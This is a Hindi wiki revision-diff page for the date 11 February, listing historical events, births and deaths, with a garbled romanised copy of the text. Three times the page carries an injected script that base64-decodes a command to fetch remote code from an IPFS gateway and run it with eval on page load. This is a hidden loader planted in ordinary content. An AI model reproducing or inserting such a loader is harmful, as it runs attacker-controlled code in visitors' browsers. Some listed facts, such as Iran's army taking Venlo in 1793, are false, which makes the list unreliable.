Difference between revisions of "11 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(16 intermediate revisions by 6 users not shown)
Line 5: Line 5:
 
==11 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==11 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
* 1543 - इंग्लैंड और रोम के बीच फ़्रांस के ख़िलाफ़ समझौता हुआ।
 
* 1543 - इंग्लैंड और रोम के बीच फ़्रांस के ख़िलाफ़ समझौता हुआ।
 +
* 1613 - मुग़ल शासक [[जहांगीर]] ने ईस्ट इंडिया कंपनी को [[सूरत]] में कारखाना लगाने की अनुमति दी।
 +
* 1720 - स्वीडन तथा [[ईरान]] के बीच शांति समझौता।
 +
* 1793 - ईरान की सेना ने नीदरलैंड के वेनलो पर क़ब्ज़ा किया।
 
* 1794 - यूनाइटेड स्टेट्स की सीनेट का सेशन पहलीबार आम जनता के लिए खोला गया।
 
* 1794 - यूनाइटेड स्टेट्स की सीनेट का सेशन पहलीबार आम जनता के लिए खोला गया।
 
* 1798 - फ़्रांस ने रोम पर कब्ज़ा किया।
 
* 1798 - फ़्रांस ने रोम पर कब्ज़ा किया।
 +
* 1814 - यूरोपीय देश नॉर्वे ने स्वतंत्रता की घोषणा की।
 
* 1826 - लंदन यूनिवर्सिटी की स्थापना 'यूनिवर्सिटी कॉलेज लंदन' के नाम से की गई।
 
* 1826 - लंदन यूनिवर्सिटी की स्थापना 'यूनिवर्सिटी कॉलेज लंदन' के नाम से की गई।
 
* [[1889]] - जापान में संविधान लागू हुआ।
 
* [[1889]] - जापान में संविधान लागू हुआ।
 
* [[1916]] - एमा गोल्डमैन को बर्थ कंट्रोल पर भाषण देने के लिए गिरफ़्तार किया गया।
 
* [[1916]] - एमा गोल्डमैन को बर्थ कंट्रोल पर भाषण देने के लिए गिरफ़्तार किया गया।
 +
* [[1919]] - फ्रेडरिक एबर्ट [[जर्मनी]] के [[राष्ट्रपति]] चुने गये।
 
* [[1922]] - चीन को स्वतंत्रता दिलाने के लिए नौ देशों ने वाशिंगठन में एक संधि पर हस्ताक्षर किये।
 
* [[1922]] - चीन को स्वतंत्रता दिलाने के लिए नौ देशों ने वाशिंगठन में एक संधि पर हस्ताक्षर किये।
 
* [[1929]] - लैटर्न संधि के तहत स्वतंत्र बेटिकलन सिटी की स्थापना हुई।
 
* [[1929]] - लैटर्न संधि के तहत स्वतंत्र बेटिकलन सिटी की स्थापना हुई।
 
* [[1933]] - गांधी जी के हरिजन वीकली का प्रकाशन शुरू हुआ था।
 
* [[1933]] - गांधी जी के हरिजन वीकली का प्रकाशन शुरू हुआ था।
 
* [[1942]] - प्रसिद्ध समाजसेवी जमनालाल बजाज का निधन।
 
* [[1942]] - प्रसिद्ध समाजसेवी जमनालाल बजाज का निधन।
 +
* [[1944]] - जर्मन सेना ने [[इटली]] के अप्रिलिया पर दोबारा क़ब्ज़ा किया।
 
* [[1953]] - सोवियत यूनियन ने इजरायल के साथ राजनीतिक संबंध समाप्त कर लिये।
 
* [[1953]] - सोवियत यूनियन ने इजरायल के साथ राजनीतिक संबंध समाप्त कर लिये।
 +
* [[1959]] - भारतीय क्रिकेटर वीनू माकंड ने अपना आखिरी टेस्ट वेस्टइंडीज के ख़िलाफ़ दिल्ली में खेला।
 
* [[1963]] - अमेरिका ने इराक की नयी सरकार को मान्यता दी।
 
* [[1963]] - अमेरिका ने इराक की नयी सरकार को मान्यता दी।
 
* [[1964]] -  
 
* [[1964]] -  
Line 22: Line 29:
 
* [[1974]] - मोहम्मदउल्ल बांग्लादेश के राष्ट्रपति निर्वाचित।  
 
* [[1974]] - मोहम्मदउल्ल बांग्लादेश के राष्ट्रपति निर्वाचित।  
 
* [[1975]] - ब्रिटिश कंजरवेटिव पार्टी की प्रथम महिला नेता के रूप में मागरेट थैचर का निर्वाचन।  
 
* [[1975]] - ब्रिटिश कंजरवेटिव पार्टी की प्रथम महिला नेता के रूप में मागरेट थैचर का निर्वाचन।  
 +
* [[1979]] - [[ईरान]] के [[प्रधानमंत्री]] ने इस्तीफ़ा दिया, ईरान के सर्वोच्च नेता अयातुल्ला खमैनी का सत्ता पर क़ब्ज़ा।
 
* [[1986]] - असंतुष्ट यहूदी अनातोली शरास्की को नौ साल बाद सोवियत जेल से रिहा।
 
* [[1986]] - असंतुष्ट यहूदी अनातोली शरास्की को नौ साल बाद सोवियत जेल से रिहा।
 +
* [[1987]] - [[अमेरिका]] ने नेवादा परीक्षण स्थल पर परमाणु परीक्षण किया।
 
* [[1990]] -  
 
* [[1990]] -  
 
**दक्षिण अफ़्रीका के अश्वेत नेता नेल्सन मंडेला 28 वर्षों बाद जेल से रिहा किये गए।  
 
**दक्षिण अफ़्रीका के अश्वेत नेता नेल्सन मंडेला 28 वर्षों बाद जेल से रिहा किये गए।  
Line 42: Line 51:
 
* [[2009]] - असमिया के प्रसिद्ध लेखक डॉ. लक्ष्मी नन्दन बोरा को [[सरस्वती सम्मान]] देने की घोषणा हुई।
 
* [[2009]] - असमिया के प्रसिद्ध लेखक डॉ. लक्ष्मी नन्दन बोरा को [[सरस्वती सम्मान]] देने की घोषणा हुई।
 
* [[2010]] - [[भारत]] के परमाणु ऊर्जा आयोग के अध्यक्ष श्रीकुमार बनर्जी और ब्रिटिश उच्चायुक्त रिचर्ड स्टाग ने भारत-ब्रिटेन असैन्य परमाणु करार संबंधी संयुक्त घोषणा पर हस्ताक्षर किए।  
 
* [[2010]] - [[भारत]] के परमाणु ऊर्जा आयोग के अध्यक्ष श्रीकुमार बनर्जी और ब्रिटिश उच्चायुक्त रिचर्ड स्टाग ने भारत-ब्रिटेन असैन्य परमाणु करार संबंधी संयुक्त घोषणा पर हस्ताक्षर किए।  
 +
** 60वें बर्लिन अंतरराष्ट्रीय फिल्म उत्सव में हनी को मिला गोल्डन बीयर पुरस्कार।
 +
* [[2013]] - रूस के कोमी क्षेत्र में विस्फोट में 18 मजदूर मारे गये।
 +
* [[2018]] - सारातोव एयरलाइन्स का विमान 703 रूस में दुर्घटनाग्रस्त, जिसमें 71 लोगों की मौत।
 +
 
==11 फ़रवरी को जन्मे व्यक्ति==
 
==11 फ़रवरी को जन्मे व्यक्ति==
 +
* [[1950]] - [[राव इन्द्रजीत सिंह]] - [[भारतीय जनता पार्टी]] के राजनीतिज्ञ हैं।
 +
* [[1931]] - [[गोपी चंद नारंग]] - भारतीय सिद्धांतकार, साहित्यिक आलोचक और विद्वान हैं।
 +
* [[1929]] - [[आर. वी. एस. पेरी शास्त्री]] - [[भारत]] के भूतपूर्व [[मुख्य निर्वाचन आयुक्त]] थे।
 
* [[1917]] - टी नागि रेड्डी - भारतीय क्रांतिकारी (मृत्यु- 1976)
 
* [[1917]] - टी नागि रेड्डी - भारतीय क्रांतिकारी (मृत्यु- 1976)
 +
* [[1913]] - [[सुरेन्द्रनाथ द्विवेदी]] - [[उड़ीसा]] के जानमाने राजनीतिज्ञ, सामाजिक कार्यकर्ता और पत्रकार थे।
 +
* 1750 - [[तिलका माँझी]] - '[[भारतीय स्वाधीनता संग्राम]]' के पहले शहीद।
 +
* [[1901]] - [[दामोदर स्वरूप सेठ]]-  भारतीय क्रांतिकारी
 +
 
==11 फ़रवरी को हुए निधन==
 
==11 फ़रवरी को हुए निधन==
* 1713 - [[जहाँदारशाह]] - [[मुग़ल]] सम्राट (जन्म- 1664)
+
* [[2022]] - [[रवि टंडन]] - जानेमाने भारतीय फ़िल्म निर्देशक थे।
 +
* [[2018]] - प्रबाती घोष - महिला फिल्म निर्माता थीं।
 +
* [[2015]] - [[विष्णु विराट]] - [[हिंदी]] तथा [[ब्रजभाषा|ब्रज]] के सरस गीता-दोहाकार एवं प्रतिष्ठित विद्वान।
 +
* [[1974]] - [[घंटासला वेंकटेश्वर राव]] - [[तमिल भाषा|तमिल]] सिनेमा में उत्कृष्ट संगीतकार थे।
 
* [[1945]] - [[हरिकृष्ण 'जौहर']] -  [[हिन्दी]] के आरम्भिक [[उपन्यास]] लेखकों में से एक।
 
* [[1945]] - [[हरिकृष्ण 'जौहर']] -  [[हिन्दी]] के आरम्भिक [[उपन्यास]] लेखकों में से एक।
 +
* [[1942]] - [[जमनालाल बजाज]] - स्वतंत्रता संग्राम सेनानी, उद्योगपति और मानवशास्त्री थे।
 
* [[1968]] - [[दीनदयाल उपाध्याय]], राजनीतिज्ञ  
 
* [[1968]] - [[दीनदयाल उपाध्याय]], राजनीतिज्ञ  
 
* [[1977]] - [[फ़ख़रुद्दीन अली अहमद]], [[भारतवर्ष]] के पाँचवे [[राष्ट्रपति]]।
 
* [[1977]] - [[फ़ख़रुद्दीन अली अहमद]], [[भारतवर्ष]] के पाँचवे [[राष्ट्रपति]]।
Line 55: Line 79:
 
* जार्ज वाशिंगटन जयन्ती (संयुक्त राज्य अमेरिका)।
 
* जार्ज वाशिंगटन जयन्ती (संयुक्त राज्य अमेरिका)।
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-today-11-02-2017/today-in-history/news/777093.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 12:33, 3 March 2024

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 11 faravari varsh ka 42 vaan din hai. sal mean abhi aur 323 din shesh haian. (lip varsh mean 324 din)

11 faravari ki mahattvapoorn ghatanaean

  • 1543 - ianglaiand aur rom ke bich fraans ke khilaf samajhauta hua.
  • 1613 - mugal shasak jahaangir ne eest iandiya kanpani ko soorat mean karakhana lagane ki anumati di.
  • 1720 - svidan tatha eeran ke bich shaanti samajhauta.
  • 1793 - eeran ki sena ne nidaralaiand ke venalo par qabza kiya.
  • 1794 - yoonaited stets ki sinet ka seshan pahalibar am janata ke lie khola gaya.
  • 1798 - fraans ne rom par kabza kiya.
  • 1814 - yooropiy desh n aaurve ne svatantrata ki ghoshana ki.
  • 1826 - landan yoonivarsiti ki sthapana 'yoonivarsiti k aaulej landan' ke nam se ki gee.
  • 1889 - japan mean sanvidhan lagoo hua.
  • 1916 - ema goldamain ko barth kantrol par bhashan dene ke lie giraftar kiya gaya.
  • 1919 - phredarik ebart jarmani ke rashtrapati chune gaye.
  • 1922 - chin ko svatantrata dilane ke lie nau deshoan ne vashiangathan mean ek sandhi par hastakshar kiye.
  • 1929 - laitarn sandhi ke tahat svatantr betikalan siti ki sthapana huee.
  • 1933 - gaandhi ji ke harijan vikali ka prakashan shuroo hua tha.
  • 1942 - prasiddh samajasevi jamanalal bajaj ka nidhan.
  • 1944 - jarman sena ne itali ke apriliya par dobara qabza kiya.
  • 1953 - soviyat yooniyan ne ijarayal ke sath rajanitik sanbandh samapt kar liye.
  • 1959 - bharatiy kriketar vinoo makand ne apana akhiri test vestiandij ke khilaf dilli mean khela.
  • 1963 - amerika ne irak ki nayi sarakar ko manyata di.
  • 1964 -
    • grik aur turk ke bich jang ki shuruat huee.
    • taivan ne fraans ke sath apane rajanitik sanbandh samapt kiye.
  • 1968 - dakshin viyatanam mean kamyoonist sainikoan ne tin sau nagarikoan ki hatya kar samoohik roop se daphana diya.
  • 1974 - mohammadull baangladesh ke rashtrapati nirvachit.
  • 1975 - british kanjaravetiv parti ki pratham mahila neta ke roop mean magaret thaichar ka nirvachan.
  • 1979 - eeran ke pradhanamantri ne istifa diya, eeran ke sarvochch neta ayatulla khamaini ka satta par qabza.
  • 1986 - asantusht yahoodi anatoli sharaski ko nau sal bad soviyat jel se riha.
  • 1987 - amerika ne nevada parikshan sthal par paramanu parikshan kiya.
  • 1990 -
    • dakshin afrika ke ashvet neta nelsan mandela 28 varshoan bad jel se riha kiye ge.
    • afrikan neshanal kaangres ke neta nelsan mandela ko dakshin afrika sarakar ne riha kiya.
  • 1992 -
    • aljiriya mean suraksha baloan ne char muslim chhapamaroan ki giraftari ke sath bhari matra mean hathiyar bhi baramad kie.
    • je.ke.el.ef. ki kashmir ghati mean pravesh ki yojana asaphal.
  • 1997 - bharatiy khagol bhautikavid jayant vi narlikar 1996 ke yoonesko ke 'kaliang puraskar' se sammanit.
  • 1998 - apareshan bich ke tahat aandaman ke ek dvip mean aantarrashtriy giroh ke 6 sadasy mare ge aur 74 giraftar hue.
  • 1999 - chin dvara roos se 20 sukhoee l dakoo viman kharidane ki ghoshana, ameriki saansad sher aaud braun 'iandiya koankas svasth karyaval' ke adhyaksh niyukt.
  • 2003 -
    • dop test mean pak de jane par shen varn svadesh laute.
    • haj ke dauran machi bhagad d mean tin bharatiyoan sahit 20 log mare gaye.
  • 2005 - pakistan mean bhari varsha ke karan baandh dhaha, 100 se adhik mare.
  • 2007 - hiandalko dvara ameriki ailyoominiyam farm n aauvalis ka adhigrahan.
  • 2008 -
    • rus ke pradhanamantri viktar jubakov do divasiy yatra par bharat pahuanche.
    • eest timor ke vidrohi sainikoan ne desh ke rashtrapati jos ramos ko goli marakar jakhmi kiya.
  • 2009 - asamiya ke prasiddh lekhak d aau. lakshmi nandan bora ko sarasvati samman dene ki ghoshana huee.
  • 2010 - bharat ke paramanu oorja ayog ke adhyaksh shrikumar banarji aur british uchchayukt richard stag ne bharat-briten asainy paramanu karar sanbandhi sanyukt ghoshana par hastakshar kie.
    • 60vean barlin aantararashtriy philm utsav mean hani ko mila goldan biyar puraskar.
  • 2013 - roos ke komi kshetr mean visphot mean 18 majadoor mare gaye.
  • 2018 - saratov eyaralains ka viman 703 roos mean durghatanagrast, jisamean 71 logoan ki maut.

11 faravari ko janme vyakti

11 faravari ko hue nidhan

11 faravari ke mahattvapoorn avasar evan utsav

  • jarj vashiangatan jayanti (sanyukt rajy amerika).

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>